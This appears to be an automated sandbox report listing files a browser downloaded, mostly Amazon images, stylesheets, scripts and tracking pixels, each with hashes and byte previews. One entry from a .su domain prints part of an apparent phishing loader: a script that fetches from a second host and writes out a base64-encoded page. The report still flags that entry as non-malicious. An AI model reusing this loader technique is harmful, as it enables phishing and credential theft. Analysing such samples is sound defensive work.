                                                                                                                                                                                                        SHA-256:BAA6F9ACD8469789404573EC33A27D763E9AA979B6831EA39D47528D3BD25028
                                                                                                                                                                                                        SHA-512:450E6B65F2D43E59882186BDEB4CAF335F63C4574C33BDBC4C880E53EA9839466F0E003B947A04058530F7554555FB4EF1E5A2C3A2A7A36B5C09AEF326402077
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259737_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................x8.}W.=.).7*y&-......{................}..(....:....kQ<..s^.GN...&...........W...V.9w.:........z....2..V........8..t.F/D#...........y...6...).....yP.v0.} H....k...vd........3k......4$t.s.........{..0z........>..}...9.vm..|..M........I.W.o.........~.S....../\R..g...)q.;..x..j..>.G@.....C.o]..l......0......k.[D...zp.M?..8O....u<..[.4.rz..`......Ku...*.>r.'..i...y.=e6uU.k...S..z3..=.....6<..[.Tq.f...V....w.H.....7o~k.....z...z.....r..*....d..K,2By.....^k.....X..G.2.m<f/z..\Ww`..^....oS..y..5.48..`.@..#....^.b....R.RxnK....<.....x{.<..!.].G.....;.^?....W...t......].?=.^....7..|...,}..y.....I.y5..>..9..R. .....X.j....B...2..f....iiOq..S\.D..~....EE.....Wv6S..k.....YN.^lW.R.-<A..\......q.............7z..i...h..@.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:5BRA4F30RSYWBFPSHBR1$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D5BRA4F30RSYWBFPSHBR1%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D4859%26pc%3D8954%26at%3D8954%26t%3D1723729132224%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D5BRA4F30RSYWBFPSHBR1%26aftb%3D1%26lob%3D0:8954
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (570)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):61068
                                                                                                                                                                                                        Entropy (8bit):5.273369773505074
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:Alc/7w2HtMrXwhCkOLaZwVXCIIo3s7mtgEoW9GVFChA33:AqFarXxC3oTgbWZA
                                                                                                                                                                                                        MD5:55CAB1E940F4E8F9CA3B895895CB57E2
                                                                                                                                                                                                        SHA1:891873B8214ABA3F7FB8A306D3D586807AB9006B
                                                                                                                                                                                                        SHA-256:E30998F16CB81E026CE4A6ABD872A0939BC89376785B7415AA115167087A3521
                                                                                                                                                                                                        SHA-512:3BEFFD01CC8AED079E8AE1A7DDEA09FCC776E408F960BD7CF582D740396CEB919467133F57068DF0B70E0CCD2A06CB1440CBE21516D44701FCBC9129E0E6157B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/51GRfnCRJBL.js?AUIClients/QuantitySelectorAssets
                                                                                                                                                                                                        Preview:(function(q){var x=window.AmazonUIPageJS||window.P,F=x._namespace||x.attributeErrors,A=F?F("QuantitySelectorAssets",""):x;A.guardFatal?A.guardFatal(q)(A,window):A.execute(function(){q(A,window)})})(function(q,x,F){function A(n){var f=!1;q.now(n).execute("qsAssetDuplicationGuard",function(a){f=!!a});return f}function L(n,f){if(!A(n))try{q.register(n,f)}catch(a){if(!a.message.includes("reregistered by QuantitySelectorAssets"))throw a;}}function Da(){var n=arguments;return{register:function(f,a){if(!A(f))try{q.when.apply(q,.n).register(f,a)}catch(c){if(!c.message.includes("reregistered by QuantitySelectorAssets"))throw c;}},execute:function(f,a){q.when.apply(q,n).execute(f,a)}}}L("QSAssetDuplicationGuard",function(){return{register:L,when:Da}});"use strict";q.when("QSAssetDuplicationGuard").execute("qsAUIDeps-main-duplication-guard",function(n){n.when("A","QuantitySelectorConstants","a-util").execute("qsAUIDeps-main",function(f,a,c){function h(){w&&w.enableCheckoutCompatibility&&g()}funct
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):40440
                                                                                                                                                                                                        Entropy (8bit):7.984929685013096
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:fXuYQ6SS2oxdbXvZTgCXwCxkwf3iXZzCOdcqgk9HrLdEcWtQ6FKK0r7q:PuGSS2udTXwBwv++Vk9LLAxFKvre
                                                                                                                                                                                                        MD5:3082D8D0886ED64BB5C79123EC89D518
                                                                                                                                                                                                        SHA1:A1A6E73C093696F1AB1293B6DA0906C1A512AF99
                                                                                                                                                                                                        SHA-256:1D3B16A1BACA920A480242C3E2ACA3AB200EBBBD97FFA66272759C4B795D1B0A
                                                                                                                                                                                                        SHA-512:17A4A7559506B7209703C4F3813D3D48825D05DE2F41942BAA39050A35F97788093C33BE41A83C0FCE362D8FE79DC0767A4F0355D133076CC0318216FB8DFC0D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_09_pencils_en._CB568181090_.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..T........Q.....R.....U.....S...........P..O..V..N.....M....................L.........".=#/>.....V...(4B.....Y...%1@....................%..M....5.........*...../................3.........Q.............(7.#3.....T................*:....)..............A........*.....,..............+..@.....*..9.hpy......1.........O.6......P...;ER....^0<J..R..`......\ep..............Q..K.....Q.....]&L.....,..............Ue......"..............!.........?...../..6.....Vx.....8_..+.......E+.+6E..rvx......Qp.w...*..Q...B..Y...NV_[3............8....H..-.........&"......DN[...8!.......7X...n........}T]g.......F...V..g..~.{.....i...D=7.|6....y..1Oi...AQu.......x?.81*.f!.:.fhd...N.....!@....g..8.......Ki.........PNJeE#.n6.......".xTx^B.J%.....H..Y.[..s..@.{;H`....f~A.. .IDATx..=..Y..u...u%..U......&......h.....@AO..,.<4.q.`..M....$...v...L4..=..T...v0.{.....m..{.{...G..<....>...?>..}.N......p.#..?.....k.h0..d....aZ.f...W...1.....Z7e.PU
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (16945), with CRLF line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):17311
                                                                                                                                                                                                        Entropy (8bit):5.817685527087937
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:qJn0KrYvbUx5IduCUsDVW5Ril0FmK81y8AS2chrle:qJr/yuCUS3l0UK8dA2hxe
                                                                                                                                                                                                        MD5:5B29F08799A55CE36252D09EA0E83C0F
                                                                                                                                                                                                        SHA1:AC44F8B79F8AF4F094E4D1ED358826600D1CFE2E
                                                                                                                                                                                                        SHA-256:891F45B06D84A9169AB7EA0E7E36C03FBD9A1F74740AC5BD22FD66572B2F415F
                                                                                                                                                                                                        SHA-512:80A24292D5CE0381DC9C28ABD884C214334B7822823CD1170F6748EE7E2DAFBAE4F3FC200E650436DFDA6C53DEF468EE32A8B1F8DC02466925C1844C4F9C581F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://eff.contempi.su/DJuy2C6F/
                                                                                                                                                                                                        Preview:<script>fetch('https://YGBZ.prosolmi.su/bimffjrqdyqqywotmgukxknFrlaLVDISNZJPKCEJEZQVNOEOUAVXEJJJKCJXKDJJA', {..method: "GET",..}).then(response => {..return response.text()..}).then(text => {..if(text == 0){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+U29jaWFsIGFuZCBTdXN0YWluYWJpbGl0eSBBY2NvdW50
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5039), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5039
                                                                                                                                                                                                        Entropy (8bit):4.846326770438963
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:w5Biav5mBVvCKvkNmemkmmm0mmmdd0wNgOZgO0WEwDSOAwn7i9uFV0t9gr9jpmg/:UHIAITnu3i1SJLXM30Ob4S
                                                                                                                                                                                                        MD5:BF018284CDA345CE0351F7FE5CB9703B
                                                                                                                                                                                                        SHA1:84988CB2EFF94081B4C1CE8E8CBEB06F9779838F
                                                                                                                                                                                                        SHA-256:3899B656185BBC97FD39CD8D0736CC1610ABDC2213CBF1C13E744AAD5D2351B0
                                                                                                                                                                                                        SHA-512:8C6454FA30CEB910E2A48B1756601D1436ADA236DB479EE9E2AD98A124AE29AA64E6A5425F8AD8BFCD4BFE561BB64060EA05DF2DB18605C18E7086A42F0E9061
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/21o-CCsjGRL.css?AUIClients/OctopusBrowsePageAssets
                                                                                                                                                                                                        Preview:.a-no-js .apb-browse-hidden-if-no-js{display:none}.apb-browse-back-arrow-icon{width:6px;height:10px;background-repeat:no-repeat;background-image:url(https://m.media-amazon.com/images/S/sash/5wejH04P3ogfQ-4.svg)}.apb-browse-refinements a:hover,.apb-browse-refinements a:hover span{color:#c45500!important;text-decoration:none}.apb-browse-refinements input,.apb-browse-refinements label{cursor:pointer}.apb-browse-refinements label{margin-left:0}.apb-browse-refinements ul{margin-left:0}.apb-browse-refinements .apb-browse-refinements-indent-1{margin-left:12px}.apb-browse-refinements .apb-browse-refinements-indent-2{margin-left:24px}.apb-browse-refinements .apb-browse-refinements-indent-3{margin-left:36px}.apb-browse-refinements .apb-browse-refinements-indent-4{margin-left:48px}.apb-browse-refinements .apb-browse-refinements-icon{top:3px;position:relative}.apb-browse-refinements .apb-browse-refinements-text-separator{background-color:#111;margin-left:2px;margin-right:2px}.a-tablet .apb-browse-
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 194 x 295, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):45977
                                                                                                                                                                                                        Entropy (8bit):7.985058314720174
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:Ox2kO+0B5izHhTPdZVliVcR3+/ku/iUYi09ERbCC4lxOQ3JZT9AlpsyjSB:OAkp45izBXfNR35u/izi2GbHU3X9An8B
                                                                                                                                                                                                        MD5:A824C7A90E2C465DA4C4DB9FD9FC15E4
                                                                                                                                                                                                        SHA1:36F46FBD4D03D1E55BC0B0D4381D351620750532
                                                                                                                                                                                                        SHA-256:6641FF165206F0F54CD94518DED93DFCBFC7436A806B0DE96991CB3DA4032A8B
                                                                                                                                                                                                        SHA-512:AF530AF8E111A8B7DA4C2776253E6BDFD295E2A84A11EBCC020024E6B8364C6D75AC2C8BAE725D6441036BB3F163E74410F87F9C9B031417F16DA330C5C708DC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.......'.............gAMA......a....KiCCPsRGB IEC61966-2.1..H..SgTS..=...BK...KoR.. RB..Ti........@...."....q....."..A...y.(..(6T....}..7o....9g..}>.F`.D....dJ....<6..'w..T ...@.-.................m@..n....8..P.....$......B....2r.2..2...t...%..[.....j..;e.O..v.$....(S*.@..@&.......X......`.(..s....`....`....).d....`...S......GE...3.(...x.W\!.S...d..T.n!...\].x.87C.P........ee......3...FvD.....9;.:;.8.:|...........?........E..............e..../.....B.._......T.B.fg...k+..m.._......_.....................2..r<[&..q.?......wL..'..b.P.GK..i....$.I...H.........k.`.~..B[P..... ..%....w......1...w..0....h....................4P.6h.>....#..;x...P..8X.BH.L.C.,.UP.%...B..Z..F8.-p.........<.^...0.o`.A.2.DX.6b..".#.Ef!~H0...!.H."E..Rd5R..#U.^....9..E.!=.=...F~C>...@..j..\...B...h....G...h%Z..B.......>G.0....3.l0...B.x,..c.b......6.....b#.{..."....;!.0. $,",'..........B.a...$....nD>1..B.%..+.u.c...[.......!..\H..8R.i......D:C.!....d.6..A.%...r.y;...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DXRRBVETR66S3T97BM5KF%26m%3D1%26sc%3Dcsa%3Asi%26si%3D46061%26pc%3D61670%26at%3D61670%26t%3D1723729136981%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DXRRBVETR66S3T97BM5KF%26aftb%3D1%26lob%3D1:61670
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3097
                                                                                                                                                                                                        Entropy (8bit):7.796732921016361
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:/85mpc2BJWJDMOX3U3Ju8DMvvH/njc2WRiMqZTSf57Pn35fpHsub9:/86c2mp9HU3OvHjcxRaNSfRJfVJ
                                                                                                                                                                                                        MD5:D6CDF967FF56E4FC4101417898604FB3
                                                                                                                                                                                                        SHA1:3C5502DAB48481B09937CB2FC2911D98375B9ACD
                                                                                                                                                                                                        SHA-256:AAA083549A0B0892E4E3521D3480FD10CAE51F41B7B995B7D36C78C799D97A0E
                                                                                                                                                                                                        SHA-512:0C0D5CC3815D8FF7BF93B4BF2BE42C8E5E3B0A2B0FEB1D73B909189382989C7F0EE762285AB232A29362CE34A07F299FAA5E46D6F6AB4B2852BC48404E888FAF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NGI2NmQ3NTEt-w186._SY116_CB642007527_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......t...."..........5.......................................................................|.D..~..........#1...:.L...X.7v3E............|*.3#].........UlV.#rs...v.............zF.,w.".....lno.....Vr...l:/...N.a........~...O..zS9....:.........).J.~d...(........G...+......'..s.k._[...^..^..n.Y.5&.....>...n.Z..y...o...Ob....y{..Nt4..0..............@............................!1AQ."02aq..@RrBb.......$6CDsu............?......?%..gn....Y..l...k.>\.S/.!.......B...#..x..0=.....R.d8..Gt....A.....~..p..-...Z....O.~.8.,..P.SJ..W...iWP..g.p~I.,..#.....2.l..>>.rj."I.D..].*`.*q .E$.......>S.E..,...d..N.U.....%0R..]R.....W.A....r$..H.Y)...~...[...2.......V....9......r.W%y..U:.`..,....N.Tn...o....x.9h..70..qQ-.K].4.S..Tv8..C....X5.y......+...((+....;..G.k...H"......5...4..#.P...........m.i..w.....&..no....p.%@
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1438
                                                                                                                                                                                                        Entropy (8bit):7.4301903007245205
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:TRe+0CmRdRaN9HFntvWdRJgVuSUy7IrLZeRMT9zZEkCuR1C7BMOqrr:TT0rTRm9lt+xg/WLZe6IraXH
                                                                                                                                                                                                        MD5:77F93C1FDBAFC67AE8AFF833FFEBF1CC
                                                                                                                                                                                                        SHA1:176864A0C17A47414D7C0B7D503753229D3677EB
                                                                                                                                                                                                        SHA-256:AA644C37917FCBCA55F6F942F6E6C72D065C8A25A6DA0F33D3CFA66DA76AC5AB
                                                                                                                                                                                                        SHA-512:C0E7FCF6B99A1F1DDA0219309512CB10877C8325A0D121FA88690D50B84E75AF90BECAC2ADF438E3964B7474883FAB9FCD723EEEE8AA3AF57ACF8CFCCEFFD700
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213328_UAE_3151165_153x125_en_AE._SY116_CB428587699_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!..1AQa..."#Rbq..$.................................................!1."#2Aa............?............T..4j.T..A..n6.{...U....*..4\|4.MgB...;...y....L..w.gS>U.................w...X.M.iv;J...t......#..m.{~..ce.?O..o..Tf.:%.V............d..W8C.kz.(/..}..CB......j<S....%.]..g...$...D..............P8Nj.........G.P..=....&..tD.3..K.p..o}.v........&...=.k..|..a.>.c.]wOw%..p./.....y...[..k.e..}6<..w..Q..p.Q.&..e.+".....u.u9N.T...%(.kri........\..... ........R.@..W:....m.....Y..d......................I>..Oj....vM.6..e.....*.c...nyj..nSWj7J...RQ.Si.7..._d......s..|M..}...'..+...\.s...?..t..8.s....m....z..Y.h.c.5..I...g..w...'q@.............1........W..u.......bQ.x.#.!/X....._F.Y...F.~.k|...I .....|...X,..<..._..TR.#.#..<.f.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3AbrowserQuiteMut%26pc%3D15073%26at%3D15073%26t%3D1723729109587%26csmtags%3DbrowserQuiteMut%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15073
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1231)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2564
                                                                                                                                                                                                        Entropy (8bit):5.09985561571782
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:/O3OpHOp8OrOhO18lupnGpwpCpvpSpiULvApSprpEZ9J9k9i9k9K9Ef9k9K9pGK+:S8Mt9Y
                                                                                                                                                                                                        MD5:5462AAAA4A0C57A4F6EF891AE4251B47
                                                                                                                                                                                                        SHA1:94BE8E39623702BA8F7E2CD194087F8D5B02FBA3
                                                                                                                                                                                                        SHA-256:5EF8905853D99C87B170592136B8F03D77169D78A2AAE47E9F5459175F5ED5CF
                                                                                                                                                                                                        SHA-512:A1092DD6422D90C07DB3F74EAB32F65249AF35FC27A7BE444E4F41D77928840DBAAA30F298E6C38B2D440F36CE0DEC3B1EAF2777D15B9D674A91DA1AC87F990C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/11Hy-4jiUaL.css?xcp
                                                                                                                                                                                                        Preview:._cropped-image-link_style_cropped-image-link__3winf{height:600px}@media (max-width:767px){._cropped-image-link_style_cropped-image-link__3winf._cropped-image-link_style_tablet-app__1Ez8O{height:368px}}@media (min-width:768px) and (max-width:919px){._cropped-image-link_style_cropped-image-link__3winf._cropped-image-link_style_tablet-app__1Ez8O{height:470px}}[data-grid-size="3"] ._cropped-image-link_style_cropped-image-link__3winf,[data-grid-size="4"] ._cropped-image-link_style_cropped-image-link__3winf{height:615.6px}[data-grid-size="5"] ._cropped-image-link_style_cropped-image-link__3winf{height:748px}.._cropped-image-link_style_centerImage__1rzYI{height:100%;width:100%}.._cropped-image-link_image_round-corners__22iOW{border-radius:4px}._cropped-image-link_image_asin-container-white-box__3Stwp:before,._cropped-image-link_image_asin-container__LRY5p:before{content:"";display:block;height:0;padding-bottom:100%}._cropped-image-link_image_asin-container__LRY5p{-webkit-box-flex:1;-ms-flex:
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 400 x 750, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):27972
                                                                                                                                                                                                        Entropy (8bit):7.9746563718982335
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:PYh3ZcLbZnL3Azzh2/99/KL6sFxvjCENS:A8397Afhgjq6yv9NS
                                                                                                                                                                                                        MD5:1B5A1FB097715B1604B21ABA92EF6A3E
                                                                                                                                                                                                        SHA1:C4A765AEDD886DC04D89E7E93B6A02C59ECB7013
                                                                                                                                                                                                        SHA-256:437E95A363A4291060E34BA170E043274E0155821E9BE374F35DE3C4F13CBAA5
